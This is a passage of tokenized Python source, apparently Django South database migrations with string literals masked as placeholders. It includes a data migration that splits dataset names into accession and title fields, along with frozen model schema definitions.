} ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> class Migration ( DataMigration ) : <EOL> def forwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> for dataSet in orm [ '<STR_LIT>' ] . objects . all ( ) : <EOL> colonPos = dataSet . name . find ( '<STR_LIT::>' ) <EOL> if ( colonPos >= <NUM_LIT:0> ) : <EOL> dataSet . accession = dataSet . name [ : colonPos ] <EOL> dataSet . title = dataSet . name [ colonPos + <NUM_LIT:2> : ] <EOL> dataSet . save ( ) <EOL> def backwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:3>' } ) , <EOL> 